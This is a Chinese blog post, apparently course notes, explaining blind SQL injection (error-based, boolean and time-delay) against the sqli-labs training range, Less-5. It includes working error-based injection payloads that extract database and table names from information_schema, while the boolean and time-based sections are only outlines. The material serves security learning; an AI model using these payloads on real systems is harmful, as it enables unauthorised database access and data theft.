【小迪安全】Day16web漏洞-SQL注入之盲注

web漏洞-SQL注入之盲注

前言

​ 本文介绍了SQL注入的盲注方法。盲注方法主要是用在前端页面不回显sql语句内容的时候,如注册等。

盲注类型

报错盲注

​ 报错盲注是指前端虽然不回显内容,但是我们可能可以通过sql语句报错来显示我们需要的数据。用sqlilabs靶场的less-5举例。sqlilabs靶场的安装请看https://blog.csdn.net/qq_44312640/article/details/127573726?spm=1001.2014.3001.5502

# 参考文章:https://www.cnblogs.com/zane-s/articles/12371820.html#w58wxCp4
# 爆数据库等信息,原理暂不研究
第一种:or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第二种:union select concat(floor(rand(0)*2),"===",(select database())) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆表名等信息
union select concat(floor(rand(0)*2),"===",(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1)) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆字段等信息

猜解数据库
猜解表
猜解字段
猜解内容

布尔盲注

​ 布尔盲注指的是通过and连接符等通过观察页面是否正常来判断条件是否成立的一种注入方法。以sqlilabs靶场的less-5举例。

猜解数据库
猜解表
猜解字段
猜解内容

延迟注入

​ 延迟注入和布尔注入差不多,通过条件注入延迟函数,观察页面返回时间来判断条件是否正确。以sqlilabs靶场的less-5举例。剩下的根据布尔盲注类推即可。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值